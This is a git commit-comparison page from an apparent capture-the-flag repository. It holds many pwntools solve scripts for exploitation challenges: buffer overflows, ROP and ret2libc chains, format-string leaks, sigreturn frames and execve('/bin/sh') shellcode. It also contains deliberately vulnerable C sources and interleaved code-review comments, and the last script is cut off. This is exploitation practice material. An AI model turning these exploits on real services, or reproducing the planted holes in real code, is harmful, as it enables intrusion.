Compare commits


156 Commits

Author SHA1 Message Date
jc 6402b4e2a9 solve script 2025-08-06 20:16:12 +03:00
jc e5e052ef8b binary 2025-08-06 20:16:04 +03:00
jc 48d9b4ecb1 oops 2025-08-06 20:05:50 +03:00
jc 7779d922cf oops 2025-08-06 20:05:30 +03:00
jc 8a12eae871 solve script 2025-08-06 19:59:17 +03:00
jc d8f2ba18d8 binary 2025-08-06 19:59:08 +03:00
jc 96683cf9ce solve script 2025-08-06 19:20:33 +03:00
jc e582d2536a binary 2025-08-06 19:20:22 +03:00
jc efa1c23dbb solve script 2025-08-06 19:18:02 +03:00
jc 15003e5606 binary 2025-08-06 19:17:53 +03:00
jc 7722ca5a21 solve script 2025-08-06 19:13:20 +03:00
jc e29ebfb654 binary 2025-08-06 19:13:10 +03:00
jc 01d5e47459 solve script 2025-08-06 19:10:38 +03:00
jc f1b113f802 binary 2025-08-06 19:10:28 +03:00
jc 3d11a08530 cleaner 2025-08-06 16:40:56 +03:00
jc 22df1755c0 solve script 2025-08-06 16:10:59 +03:00
jc 18a146b1a5 binary 2025-08-06 16:10:47 +03:00
jc 5e0b579bfc solve script 2025-08-06 16:08:46 +03:00
jc 16e21c1763 binary 2025-08-06 16:08:35 +03:00
jc 5a5b449511 solve script 2025-08-06 15:44:25 +03:00
jc 2dd6d163af binary 2025-08-06 15:44:16 +03:00
jc 9a2edba20d solve script 2025-08-06 15:41:18 +03:00
jc 476fe82faf binary 2025-08-06 15:38:12 +03:00
jc 828a4eca97 solve script 2025-08-06 15:35:19 +03:00
jc 72f01e0427 binary 2025-08-06 15:35:10 +03:00
jc c0b1f1e2d3 solve script 2025-08-06 15:30:40 +03:00
jc 831408aedf binary 2025-08-06 15:30:30 +03:00
jc 6dca4f2970 solve script 2025-08-06 15:19:24 +03:00
jc c01f22eab5 binary 2025-08-06 15:19:14 +03:00
jc d047d4a1ef solve script 2025-08-06 15:15:18 +03:00
jc baab6f675e binary 2025-08-06 15:15:07 +03:00
jc 72e17002f9 oops 2025-08-05 18:24:54 +03:00
jc d087cb7430 solve script 2025-08-05 18:19:59 +03:00
jc ec2cdb7b35 binary 2025-08-05 18:19:49 +03:00
jc 4af1604d90 solve script 2025-08-05 18:18:16 +03:00
jc c675b28f26 binary 2025-08-05 18:18:01 +03:00
jc 153fd786b8 solve script 2025-08-05 18:16:27 +03:00
jc 40c7bc25ee binary 2025-08-05 18:16:16 +03:00
jc 4a2179ad71 solve script 2025-08-05 18:14:39 +03:00
jc dbb004526e binary 2025-08-05 18:14:29 +03:00
jc 8009ca1f5f solve script 2025-07-29 01:35:56 +03:00
jc e05b881fa7 binary 2025-07-29 01:35:20 +03:00
jc 88c88f3a62 solve script 2025-05-11 22:17:10 +03:00
jc 483f58ba63 binary 2025-05-11 22:16:34 +03:00
jc b98813ca8a solve script 2025-03-27 23:58:07 +03:00
jc 4ea52ad817 fake flag 2025-03-27 23:57:54 +03:00
jc a7ad2fc055 libraries 2025-03-27 23:57:42 +03:00
jc 90dcd7da8b binary 2025-03-27 23:57:31 +03:00
jc 22ae6d18ef solve script 2025-03-27 23:57:18 +03:00
jc 7ac3f4d224 binary 2025-03-27 23:57:08 +03:00
jc 2bb59fb08f solve script 2025-03-27 23:56:51 +03:00
jc 15d9e43702 binary 2025-03-27 23:56:40 +03:00
jc 9032cf633c solve script 2025-03-27 23:56:25 +03:00
jc dbfe2c981b fake flag 2025-03-27 23:56:15 +03:00
jc 02ed79a775 libraries 2025-03-27 23:56:03 +03:00
jc a066585f12 binary 2025-03-27 23:55:51 +03:00
jc fcf3a9ee0f solve script 2025-03-27 23:54:35 +03:00
jc 7f8eed4e60 fake flag 2025-03-27 23:54:20 +03:00
jc 9d44530e70 libraries 2025-03-27 23:54:04 +03:00
jc 75d63586b3 binary 2025-03-27 23:53:38 +03:00
jc af72710a35 solve script 2025-03-21 08:10:23 +03:00
jc 9bfd5552b2 libc 2025-03-21 08:10:01 +03:00
jc 11486f525c loader 2025-03-21 08:09:50 +03:00
jc fc30e1e38c binary 2025-03-21 08:09:39 +03:00
jc e076f1ee01 solve script 2025-03-20 21:43:03 +03:00
jc ac8a3bc7a9 binary 2025-03-20 21:42:43 +03:00
jc 33e18b7b00 solve script 2025-03-20 21:32:32 +03:00
jc 775502ff2a binary 2025-03-20 21:32:08 +03:00
jc a70a98afc4 solve script 2025-03-20 21:06:43 +03:00
jc ac464ebd74 binary 2025-03-20 21:06:31 +03:00
jc e22305275f solve script 2025-03-19 02:08:17 +03:00
jc f93869c059 source code 2025-03-16 22:32:26 +03:00
jc 0310370a2e binary 2025-03-16 22:32:14 +03:00
jc 7ccc26a4f6 solve script 2025-03-12 21:26:39 +03:00
jc 37f00f4322 source code 2025-03-12 21:26:27 +03:00
jc 69328686b0 binary 2025-03-12 21:26:14 +03:00
jc 29243e6a69 solve script 2024-12-12 18:21:10 +03:00
jc 3167ec2181 solve script 2024-12-12 16:42:05 +03:00
jc 0dba4c91ab binary 2024-12-12 16:41:51 +03:00
jc a06dc4e7a8 solve script 2024-12-12 13:38:04 +03:00
jc 464e60118d binary 2024-12-12 13:37:36 +03:00
jc 34260465db solve script 2024-11-30 19:21:57 +03:00
jc de0927e6c6 libs 2024-11-30 19:21:39 +03:00
jc 227524ceac binary 2024-11-30 19:21:26 +03:00
jc 7fc17ce834 solve script 2024-11-30 19:21:10 +03:00
jc c46956e88d libc 2024-11-30 19:20:46 +03:00
jc 437625403b loader 2024-11-30 19:20:36 +03:00
jc d8af98b051 binary 2024-11-30 19:20:24 +03:00
jc deab8877c6 solve script 2024-11-29 22:06:05 +03:00
jc 534786af14 binary 2024-11-29 22:05:54 +03:00
jc a92eb896d1 solve script 2024-11-27 22:23:08 +03:00
jc 6aa37b8571 binary 2024-11-27 22:22:57 +03:00
jc 5f56f5e7e3 solve script 2024-11-27 22:22:33 +03:00
jc 4cc0dcab43 binary 2024-11-27 22:21:59 +03:00
jc e8d31313ef solve script 2024-11-27 22:21:35 +03:00
jc 9665209a76 binary 2024-11-27 22:21:20 +03:00
jc f03955debc solve script 2024-11-27 22:11:05 +03:00
jc 85d6906fae binary 2024-11-27 22:10:53 +03:00
jc d0c429824f solve script 2024-11-18 19:56:53 +03:00
jc 031201a421 solve script 2024-11-18 19:52:31 +03:00
jc 3b9dba1423 binary 2024-11-18 19:52:20 +03:00
jc 21b17c6f04 libc 2024-11-18 19:51:54 +03:00
jc 067cabe828 loader 2024-11-18 19:51:42 +03:00
jc 8709b54d81 solve script 2024-11-18 19:51:05 +03:00
jc 6ad0bccc1a binary 2024-11-18 19:50:51 +03:00
jc 634b1ab1d5 libc 2024-11-18 19:50:32 +03:00
jc 5476a2e3ff loader 2024-11-18 19:50:08 +03:00
jc 5191989368 solve script 2024-11-18 19:49:43 +03:00
jc 3d7dffbaa3 binary 2024-11-18 19:49:31 +03:00
jc a44f6a8368 libc 2024-11-18 19:49:14 +03:00
jc 05d7dab3fb loader 2024-11-18 19:48:59 +03:00
jc 10ac152ca1 solve script 2024-11-18 19:48:31 +03:00
jc 791e7b9c99 binary 2024-11-18 19:48:10 +03:00
jc 5340d5e29e solve script 2024-11-18 19:47:47 +03:00
jc 38bdf097b9 binary 2024-11-18 19:47:37 +03:00
jc f8e6ea66d2 solve script 2024-11-18 19:46:59 +03:00
jc 481177cdcb binary 2024-11-18 19:45:54 +03:00
jc 03542d0718 libc 2024-11-18 19:45:39 +03:00
jc d690f93d83 loader 2024-11-18 19:45:25 +03:00
jc c71564b667 solve script 2024-11-15 23:48:35 +03:00
jc 5fade1f343 binary 2024-11-15 23:48:21 +03:00
jc 85fea97836 solve script 2024-11-15 23:48:04 +03:00
jc 853acb8ecf C code 2024-11-15 23:47:54 +03:00
jc 9f7a92d635 solve script 2024-11-15 23:47:35 +03:00
jc 339488b990 binary 2024-11-15 23:47:22 +03:00
jc 083b13e139 solve script 2024-11-15 23:47:07 +03:00
jc b4f7309082 C code 2024-11-15 23:46:13 +03:00
jc 62b2515039 binary 2024-11-15 23:45:42 +03:00
jc 609ab7d057 second solve script 2024-11-10 21:00:24 +03:00
jc 1545329292 first solve script 2024-11-10 21:00:11 +03:00
jc ab4d74d35e binary 2024-11-10 20:59:42 +03:00
jc d4c477f9f9 binary 2024-10-29 20:31:21 +03:00
jc 4f91b8d5f8 solve script 2024-10-29 20:31:07 +03:00
jc ecb666932f solve script 2024-10-29 20:12:25 +03:00
jc 61f2abc882 binary 2024-10-29 20:12:14 +03:00
jc 4ff87bf93b solve script 2024-10-28 22:51:13 +03:00
jc 891e0d6b16 binary 2024-10-28 22:51:01 +03:00
jc fb603dfa60 solve script 2024-10-28 22:19:29 +03:00
jc 92ec613644 binary 2024-10-28 22:19:19 +03:00
jc 3e4988716a solve script 2024-10-28 21:32:26 +03:00
jc 7cbcd054c3 binary 2024-10-28 21:32:01 +03:00
jc 4153f58c73 solve script 2024-10-28 16:26:11 +03:00
jc 2abac594dc helper 2024-10-28 16:25:49 +03:00
jc dfd521d190 binary 2024-10-28 16:25:27 +03:00
jc 33d52a6d0f solve script 2024-10-28 10:03:40 +03:00
jc bfe1478c01 binary 2024-10-28 10:03:24 +03:00
jc 5534052b96 solve script 2024-10-28 01:28:03 +03:00
jc c6c10aaf35 binary 2024-10-28 01:17:58 +03:00
jc 31dbf17bda solve script 2024-10-28 01:12:36 +03:00
jc 6ccc9f60d0 binary 2024-10-28 01:12:25 +03:00
jc a4e1a18d3f solve script 2024-10-28 00:31:42 +03:00
jc 815575f8a8 binary 2024-10-28 00:31:33 +03:00
jc 5bdccf9a91 solve script 2024-10-27 22:35:45 +03:00
jc 9713fcda8c binary 2024-10-27 22:35:33 +03:00
jc db18ac85fd solve script 2024-10-27 22:32:08 +03:00
jc a90b87e454 binary 2024-10-27 22:31:56 +03:00
155 changed files with 2162 additions and 0 deletions
+16
@@ -0,0 +1,16 @@
#!/usr/bin/python3
from pwn import *
context.binary = target = ELF("./floormat_sale", checksec=False)
# r = process()
r = remote("floormatsale.ctf.intigriti.io", 1339)
# funcs
s = lambda a: r.sendlineafter(b":", a)
# buf
s(b"6")
s(b"%1c%11$n"+p64(0x40408c))
r.interactive()
Binary file not shown.
+27
@@ -0,0 +1,27 @@
#!/usr/bin/python3
from pwn import *
context.binary = target = ELF("./retro2win", checksec=False)
# r = process()
r = remote("retro2win.ctf.intigriti.io", 1338)
# funcs
s = lambda a: r.sendlineafter(b":", a)
# gadgets
pop_rdi = 0x4009b3
pop_rsi_r15 = 0x4009b1
# leak
s(b"1337")
buf = b"A"*24
buf += p64(pop_rdi)
buf += p64(0x2323232323232323)
buf += p64(pop_rsi_r15)
buf += p64(0x4242424242424242)
buf += p64(0)
buf += p64(target.sym.cheat_mode)
s(buf)
r.interactive()
Binary file not shown.
@@ -0,0 +1,18 @@
#!/usr/bin/python3
from pwn import *
context.binary = target = ELF("./rigged_slot2", checksec=False)
# r = process()
r = remote("riggedslot2.ctf.intigriti.io", 1337)
# funcs
s = lambda a: r.sendlineafter(b":", a)
# buf
buf = b"A"*20
buf += p64(1337421)
s(buf)
s(b"1")
r.interactive()
Binary file not shown.
+25
@@ -0,0 +1,25 @@
#!/usr/bin/python3
from pwn import *
context.log_level = 'error'
# funcs
s = lambda a: r.sendline(a)
# buf
for i in range(1, 100):
r = remote("5108fea3f4263a9f.247ctf.com", 50099)
buf = f"%{i}$s".encode()
try:
s(buf)
r.recvuntil(b"back ")
out = r.recvlineS()
if "247CTF" in out:
print(out)
break
except:
pass
r.close()
r.interactive()
+17
@@ -0,0 +1,17 @@
#!/usr/bin/python3
from pwn import *
context.binary = target = ELF("./hidden_flag_function", checksec=False)
# r = process()
r = remote("9fe3144560d92c37.247ctf.com", 50224)
# funcs
s = lambda a: r.sendlineafter(b"?", a)
# buf
buf = b"A"*76
buf += p64(target.sym.flag)
s(buf)
r.interactive()
Binary file not shown.
@@ -0,0 +1,21 @@
#!/usr/bin/python3
from pwn import *
context.binary = target = ELF("./hidden_flag_function_with_args", checksec=False)
# r = process()
r = remote("f3396cb78c7c71ca.247ctf.com", 50257)
# funcs
s = lambda a: r.sendline(a)
# buf
buf = b"A"*140
buf += p32(target.sym.flag)
buf += p32(0)
buf += p32(0x1337)
buf += p32(0x247)
buf += p32(0x12345678)
s(buf)
r.interactive()
+19
@@ -0,0 +1,19 @@
#!/usr/bin/python3
from pwn import *
context.binary = target = ELF("./pwn-pas-ouf", checksec=False)
# r = process()
r = process("openssl s_client -quiet -verify_quiet -connect main-5000-pwn-pas-ouf-70df26172a24b94f.ctf.4ts.fr:52525", shell=True)
# funcs
s = lambda a: r.sendline(a)
# buf
buf = b"A"*280
buf += p64(target.sym.gets)
buf += p64(target.sym.win)
s(buf)
s(b"flag")
r.interactive()
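Review bot: `process("openssl s_client -quiet -verify_quiet -connect ...", shell=True)` hands the whole command line to a shell, and the next file section repeats the same invocation; pwntools' process accepts an argument list, so `process(["openssl", "s_client", "-quiet", "-verify_quiet", "-connect", "main-5000-pwn-pas-ouf-70df26172a24b94f.ctf.4ts.fr:52525"])` avoids the shell and its quoting rules. Note also that s_client keeps the connection open after a failed certificate verification unless `-verify_return_error` is given, so `-verify_quiet` here only hides the verify output; a one-line comment stating that the peer is deliberately not verified would make the intent clear to the next reader.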
+41
@@ -0,0 +1,41 @@
#!/usr/bin/python3
from pwn import *
context.binary = target = ELF("./pwn-pas-ouf", checksec=False)
# r = process()
r = process("openssl s_client -quiet -verify_quiet -connect main-5000-pwn-pas-ouf-70df26172a24b94f.ctf.4ts.fr:52525", shell=True)
# funcs
s = lambda a: r.sendline(a)
# buf
buf = b"A"*272
buf += p64(0x404118)
buf += p64(0x40129e)
buf += b"A"*280
buf += p64(target.sym.main)
s(buf)
# leak
r.recvuntil(b"@\n")
puts = u64(r.recv(6).ljust(8, b"\x00"))
log.info("puts: %#x", puts)
libc = puts - 0x80e50
log.info("libc: %#x", libc)
system = libc + 0x50d70
sh = libc + 0x1d8678
# gadgets
pop_rdi = libc + 0x2a3e5
# pop
buf = b"A"*280
buf += p64(pop_rdi)
buf += p64(sh)
buf += p64(pop_rdi+1)
buf += p64(pop_rdi+1)
buf += p64(system)
s(buf)
r.interactive()
BIN
Binary file not shown.
+17
@@ -0,0 +1,17 @@
#!/usr/bin/python3
from pwn import *
context.binary = target = ELF("./echo-app", checksec=False)
# r = process()
r = remote("54.85.45.101", 8008)
# funcs
s = lambda a: r.sendline(a)
# buf
buf = b"A"*264
buf += p64(target.sym.print_flag)
s(buf)
r.interactive()
BIN
Binary file not shown.
+20
@@ -0,0 +1,20 @@
#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>
void print_flag() {
puts(getenv("FLAG"));
puts("^^ Flag!!111!!!! ^^");
}
void do_echo() {
uint8_t echo_buffer[256] = {0};
gets(echo_buffer);
puts(echo_buffer);
}
int main(void) {
puts("ECHO! Echo! echo!");
do_echo();
return 0;
}
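Review bot: `gets(echo_buffer)` in do_echo reads without any bound, so input longer than the 256-byte stack array overwrites whatever follows it on the stack; replace it with `fgets((char *)echo_buffer, sizeof echo_buffer, stdin);` (gets was removed from the language in C11). The cast also resolves the `uint8_t *` to `char *` mismatch that both gets and the following puts trigger. In print_flag, `puts(getenv("FLAG"))` passes a null pointer to puts when the variable is unset, which is undefined behaviour; read it into a local first, `const char *flag = getenv("FLAG");`, and print a fallback string when it is NULL.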
+28
@@ -0,0 +1,28 @@
#!/usr/bin/python3
from pwn import *
context.binary = target = ELF("./echo-app2", checksec=False)
# r = process()
r = remote("54.85.45.101", 8009)
# funcs
s = lambda a: r.sendline(a)
# leak
buf = b"%39$p.%42$p"
s(buf)
leaks = r.recvS(34).split(".")
canary = int(leaks[0], 16)
log.info("canary: %#x", canary)
target.address = int(leaks[1], 16)-0x15a1
log.info("main: %#x", target.address)
# buf
buf = b"A"*264
buf += p64(canary)
buf += p64(0)
buf += p64(target.sym.print_flag)
s(buf)
r.interactive()
BIN
Binary file not shown.
+36
@@ -0,0 +1,36 @@
#!/usr/bin/python3
from pwn import *
context.binary = target = ELF("./ihnsaims", checksec=False)
# r = process("./ihnsaims flag{fake_flag}", shell=True)
r = remote("54.85.45.101", 8002)
# funcs
s = lambda a: r.sendafter(b"!\n", a)
# write
s(b"1")
# shellcode
sc = """
lea r12, [rdx]
a:
lea r12, [r12+0x1000]
mov rdi, 1
mov rsi, r12
mov rdx, 0x1000
mov rax, 1
syscall
cmp rax, -14
je a
jne b
b:
xor rdi, rdi
mov rax, 231
syscall
"""
sc = asm(sc)
s(sc)
r.interactive()
Binary file not shown.
+24
@@ -0,0 +1,24 @@
#!/usr/bin/python3
from pwn import *
context.binary = target = ELF("./only_ws", checksec=False)
# r = process()
r = remote("54.85.45.101", 8005)
# funcs
s = lambda a: r.sendline(a)
# shellcode
sc = """
mov rax, 1
mov rdi, 1
mov rsi, 0x4040a0
xor rdx, rdx
add dl, 0xff
syscall
"""
sc = asm(sc)
s(sc)
r.interactive()
+43
@@ -0,0 +1,43 @@
#include <seccomp.h>
#include <syscall.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <unistd.h>
#include <string.h>
typedef void shellcode();
char flag[64];
int main(int argc, char **argv) {
setvbuf(stdout, NULL, _IONBF, 0);
setvbuf(stdin, NULL, _IONBF, 0);
setvbuf(stderr, NULL, _IONBF, 0);
FILE *f = fopen("flag.txt", "r");
if (f == NULL) {
printf("error reading flag");
return -1;
}
fscanf(f, "%s", flag);
printf("Flag is at 0x%x\n", (void *)flag);
fclose(f);
char shellcode_buf[4096];
int bytes_read = read(STDIN_FILENO, shellcode_buf, sizeof(shellcode_buf));
void *shellcode_ptr =
mmap((void *)shellcode_buf, 1, PROT_READ | PROT_WRITE | PROT_EXEC,
MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
memcpy(shellcode_ptr, shellcode_buf, bytes_read);
scmp_filter_ctx ctx = seccomp_init(SCMP_ACT_KILL_PROCESS);
seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(write), 0);
seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(exit), 0);
seccomp_load(ctx);
seccomp_release(ctx);
((shellcode *)shellcode_ptr)();
}
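Review bot: The `read` result stored in bytes_read is passed to memcpy unchecked, so a failed read (-1) converts to a huge size_t length; add `if (bytes_read < 0) return -1;` before the copy, and test `shellcode_ptr != MAP_FAILED` before writing through the mmap result. `fscanf(f, "%s", flag)` has no width limit for the 64-byte flag array, so a long flag file overruns it; use `fscanf(f, "%63s", flag);`. The `printf("Flag is at 0x%x\n", (void *)flag)` line pairs `%x` with a pointer argument, which is undefined behaviour and truncates the value on 64-bit targets; `%p` is the matching conversion. main also has no return statement after the indirect call, which is fine for main in C99 but worth a comment since the call is not expected to return.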
@@ -0,0 +1,21 @@
#!/usr/bin/python3
from pwn import *
context.binary = target = ELF("./blessing", checksec=False)
r = process()
# funcs
s = lambda a: r.sendlineafter(b": ", a)
# leak
r.recvuntil(b"this: ")
malloced = int(r.recv(14), 16)
log.info("malloced: %#x", malloced)
# buf
r.recvuntil(b"song?")
s(str(malloced+1).encode())
s(b"0")
r.interactive()
Binary file not shown.
@@ -0,0 +1 @@
HTB{f4k3_fl4g_f0r_t35t1ng}
Binary file not shown.
@@ -0,0 +1,36 @@
#!/usr/bin/python3
from pwn import *
context.binary = target = ELF("./contractor", checksec=False)
while True:
r = process()
# funcs
s = lambda a,b: r.sendafter(a, b)
sl = lambda a,b: r.sendlineafter(a, b)
fill = lambda a: [sl(b"> ", i) if b"\n" in a else s(b"> ", i) for i in a]
opt = lambda a,b: (sl(b"> ", a), sl(b": ", b))
# leak
fill([b"mug3njutsu\n", b"none\n", b"13\n", b"ofcourse"+b"C"*8])
r.recvuntil(b"C"*8)
target.address = u64(r.recv(6).ljust(8, b"\x00")) - 0x1b50
log.info("pie: %#x", target.address)
# write
opt(b"4", b"A"*28+p32(0)+b"\x40")
sl(b"> ", b"no")
opt(b"4", p64(target.sym.contract))
r.recvuntil(b"lad!\n\n")
try:
r.sendline(b"id")
if r.recvline():
break
except EOFError:
pass
r.interactive()
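Review bot: Every iteration of the `while True` loop spawns a fresh `process()`, but the `except EOFError: pass` branch never closes the previous one, so each failed attempt leaves a child process and its pipes behind until the interpreter exits; add `r.close()` in that branch before the loop continues. The indentation of the loop body is not preserved in this rendering, so the loop structure is read here from the statement order. A short comment above the loop stating why it retries (the `except EOFError` suggests the target may exit early) would also help the next reader.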
Binary file not shown.
@@ -0,0 +1 @@
HTB{f4k3_fl4g_f0r_t35t1ng}
@@ -0,0 +1,37 @@
#!/usr/bin/python3
from pwn import *
context.binary = target = ELF("./crossbow", checksec=False)
r = process()
# funcs
s = lambda a: r.sendlineafter(b": ", a)
ss = lambda a: r.sendlineafter(b"> ", a)
# gadgets
pop_rax = 0x401001
pop_rdi = 0x401d6c
pop_rsi = 0x40566b
pop_rdx = 0x401139
syscall = 0x4015d3
mov_rax_rdi = 0x4020f5
# buf
buf = b"JUNK"*2
buf += p64(pop_rax)
buf += b"/bin/sh\0"
buf += p64(pop_rdi)
buf += p64(0x40d500)
buf += p64(mov_rax_rdi)
buf += p64(pop_rax)
buf += p64(59)
buf += p64(pop_rsi)
buf += p64(0)
buf += p64(pop_rdx)
buf += p64(0)
buf += p64(syscall)
s(b"-2")
ss(buf)
r.interactive()
Binary file not shown.
@@ -0,0 +1,42 @@
#!/usr/bin/python3
from pwn import *
context.binary = target = ELF("./laconic", checksec=False)
r = process()
# funcs
s = lambda a: r.send(a)
# gadgets
pop_rax = 0x43018
syscall = 0x43015
# sigframe
frame = SigreturnFrame()
frame.rax = 0
frame.rdi = 0
frame.rsi = 0x43005
frame.rdx = 0xff
frame.rip = syscall
# buf
buf = b"A"*8
buf += p64(pop_rax)
buf += p64(0xf)
buf += p64(syscall)
buf += bytes(frame)
# shellcode
sc = """
lea rdi, [rsi+32]
xor rsi, rsi
xor rdx, rdx
mov al, 59
syscall
"""
sc = asm(sc) + b"/bin/sh\0"
buf += sc
s(buf)
r.interactive()
Binary file not shown.
@@ -0,0 +1,27 @@
#!/usr/bin/python3
from pwn import *
context.binary = target = ELF("./quack_quack", checksec=False)
r = process()
# funcs
s = lambda a: r.sendafter(b"> ", a)
# buf
buf = b"A"*89
buf += b"Quack Quack "
buf += b"B"
s(buf)
r.recvuntil(b"Quack Quack ")
canary = u64(r.recv(7).rjust(8, b"\x00"))
log.info("canary: %#x", canary)
# buf
buf = b"A"*88
buf += p64(canary)
buf += b"JUNK"*2
buf += p64(target.sym.duck_attack)
s(buf)
r.interactive()
@@ -0,0 +1 @@
HTB{f4k3_fl4g_4_t35t1ng}
Binary file not shown.
+48
@@ -0,0 +1,48 @@
#!/usr/bin/python3
from pwn import *
from ctypes import CDLL
context.binary = target = ELF("./last_key", checksec=False)
libc = target.libc
lib = CDLL("./glibc/libc.so.6")
r = process()
# funcs
s = lambda a: r.sendlineafter(b": ", a)
# nums
lib.srand(lib.time(0))
first_rand = (lib.rand() % 5) + 1
second_rand = (lib.rand() % 10) + 10
diff = second_rand - first_rand
# buf
for _ in range(diff):
s(b"R")
# gadgets
pop_rdi = lambda a: p64(0x40178d) + p64(a)
# leak
buf = b"A"*24
buf += pop_rdi(target.got.puts)
buf += p64(target.sym.puts)
buf += p64(target.sym.set_score)
s(buf)
r.recvuntil(b"prize..\n\n")
puts = u64(r.recv(6).ljust(8, b"\x00"))
log.info("puts: %#x", puts)
libc.address = puts - libc.sym.puts
log.info("libc: %#x", libc.address)
system = libc.sym.system
sh = next(libc.search(b"/bin/sh\0"))
# pop
buf = b"A"*25
buf += pop_rdi(sh)
buf += p64(0x40178e)
buf += p64(system)
s(buf)
r.interactive()
Binary file not shown.
Binary file not shown.
Binary file not shown.
+17
@@ -0,0 +1,17 @@
#!/usr/bin/python3
from pwn import *
context.binary = target = ELF("./riddle", checksec=False)
r = process()
# funcs
s = lambda a: r.sendlineafter(b">> ", a)
ss = lambda a: r.sendlineafter(b": ", a)
# buf
s(b"1")
ss(b"2147483647")
ss(b"1")
r.interactive()
Binary file not shown.
Binary file not shown.
Binary file not shown.
+17
@@ -0,0 +1,17 @@
#!/usr/bin/python3
from pwn import *
context.binary = target = ELF("./challenge", checksec=False)
# r = process()
r = remote("94.72.112.248", 5050)
# funcs
s = lambda a: r.sendlineafter(b"> ", a)
ss = lambda a: r.sendline(a)
# buf
s(b"12")
ss(b"flag.txt\0")
r.interactive()
Binary file not shown.
Binary file not shown.
Binary file not shown.
+17
@@ -0,0 +1,17 @@
#!/usr/bin/python3
from pwn import *
context.binary = target = ELF("./flow", checksec=False)
# r = process()
r = remote("94.72.112.248", 7001)
# funcs
s = lambda a: r.sendlineafter(b": ", a)
# buf
buf = b"A"*60
buf += p32(0x34333231)
s(buf)
r.interactive()
BIN
Binary file not shown.
+18
@@ -0,0 +1,18 @@
#!/usr/bin/python3
from pwn import *
context.binary = target = ELF("./heap_wars", checksec=False)
# r = process()
r = remote("94.72.112.248", 1337)
# funcs
s = lambda a: r.sendlineafter(b": ", a)
# buf
s(b"1")
buf = b"A"*80
buf += p64(target.sym.theForce)
s(buf)
r.interactive()
Binary file not shown.
Binary file not shown.
Binary file not shown.
+32
@@ -0,0 +1,32 @@
#!/usr/bin/python3
from pwn import *
context.binary = target = ELF("./heaps_dont_lie", checksec=False)
# r = process()
r = remote("94.72.112.248", 1244)
# funcs
s = lambda a: r.sendline(a)
# leak
buf = b"%7$p"
s(buf)
r.recvuntil(b"tune : ")
heap = int(r.recvline().strip(), 16) + 0x850
log.info("heap: %#x", heap)
# sc
sc = """
lea rdi, [rdx+19]
xor rsi, rsi
xor rdx, rdx
mov rax, 59
syscall
"""
sc = asm(sc) + b"/bin/sh\0"
sc += b"A"*(32-len(sc))
sc += p64(heap)
s(sc)
r.interactive()
Binary file not shown.
Binary file not shown.
Binary file not shown.
+20
@@ -0,0 +1,20 @@
#!/usr/bin/python3
from pwn import *
context.binary = target = ELF("./nihil", checksec=False)
# r = process()
r = remote("94.72.112.248", 7002)
# funcs
s = lambda a: r.sendlineafter(b"?", a)
# buf
s(b"a")
buf = b"A"*16
buf += p64(0)
buf += b"JUNK"
buf += p32(727)
s(buf)
r.interactive()
BIN
Binary file not shown.
+65
@@ -0,0 +1,65 @@
#!/usr/bin/python3
from pwn import *
context.binary = target = ELF("./challenge", checksec=False)
# r = process()
r = remote("94.72.112.248", 1243)
# funcs
s = lambda a: r.sendline(a)
inc = lambda: r.sendline(b"2")
# read
for i in range(3): s(b"3")
s(b"5")
s(b"6") # 48
inc()
s(b"4")
s(b"3")
s(b"5") # 89
inc()
for i in range(2): s(b"4")
for i in range(2): s(b"3")
for i in range(5): s(b"6")
s(b"5") # d6
inc()
for i in range(3): s(b"3")
s(b"5")
s(b"6") # 48
inc()
for i in range(4): s(b"3")
for i in range(6): s(b"6")
s(b"5") # 31
inc()
for i in range(2): s(b"4")
for i in range(3): s(b"6")
s(b"3")
s(b"5") # d2
inc()
for i in range(2): s(b"4")
for i in range(9): s(b"6")
for i in range(2): s(b"3")
s(b"5") # b2
inc()
for i in range(17): s(b"5") # ff
inc()
s(b"5") # 0f
inc()
for i in range(2): s(b"3")
s(b"5")
for i in range(6): s(b"6") # 05
s(b"7")
# execve
sc = """
lea rdi, [rsi+35]
xor rsi, rsi
xor rdx, rdx
mov rax, 59
syscall
"""
sc = b"\x90"*16 + asm(sc) + b"/bin/sh\0"
s(sc)
r.interactive()
Binary file not shown.
Binary file not shown.
Binary file not shown.
+17
@@ -0,0 +1,17 @@
#!/usr/bin/python3
from pwn import *
context.binary = target = ELF("./fmt", checksec=False)
r = process()
# funcs
s = lambda a: r.sendline(a)
# leak
s(b"%136$p.%137$p")
r.recvuntil(b"Here: ")
out = "".join([unhex(a[2:])[::-1].decode() for a in r.recvlineS().split(".")])
print(out)
r.interactive()
Binary file not shown.
+65
@@ -0,0 +1,65 @@
#!/usr/bin/python3
from pwn import *
context.binary = target = ELF("./classroom", checksec=False)
libc = target.libc
r = process()
# funcs
s = lambda a: r.sendafter(b"> ", a)
ss = lambda a: r.send(a)
# gadgets
pop_rdi = lambda a: p64(0x400c43) + p64(a)
pop_rsi = lambda a: p64(0x400c41) + p64(a) + p64(0)
# loop
s(b"a")
for i in range(4):
s(b"y")
s(b"a")
s(b"y")
# leak
buf = b"A"*136
buf += pop_rdi(1)
buf += pop_rsi(target.got.write)
buf += p64(target.sym.write)
buf += pop_rdi(0)
buf += pop_rsi(0x60203c)
buf += p64(target.sym.read)
buf += p64(target.sym.kinder)
s(buf)
write = u64(r.recv(6).ljust(8, b"\x00"))
log.info("write: %#x", write)
libc.address = write - libc.sym.write
log.info("libc: %#x", libc.address)
# gadgets
jmp_rsi = libc.address + 0x3acf4
# shellcode
sc = """
lea rdi, [rsp-87]
xor rsi, rsi
xor rdx, rdx
mov rax, 2
syscall
mov rdi, rax
mov rsi, 0x602500
mov dl, 0xff
mov rax, 0
syscall
mov rdi, 1
mov rax, 1
syscall
"""
sc = asm(sc) + b"flag.txt\0"
sc += b"A"*(136-len(sc))
sc += p64(jmp_rsi)
ss(p64(4))
s(b"a")
s(sc)
r.interactive()
BIN
Binary file not shown.
+69
@@ -0,0 +1,69 @@
#!/usr/bin/python3
from pwn import *
import re
context.binary = target = ELF("./chal", checksec=False)
libc = target.libc
# bruteforce lower 12 bits
def brute():
for a in range(1, 256):
for b in range(8, 256, 16):
r = process(level="error")
partial_ret = (a << 8) | b
write = (0x61 - (partial_ret & 0xff)) & 0xff
buf = b"%c"*16 + f"%{partial_ret-16}c%hn".encode()
buf += f"%{write}c%48$hhn".encode()
r.sendlineafter(b": ", buf)
try:
r.recvuntil(b"Type")
return r, partial_ret
except:
r.kill()
continue
# leak
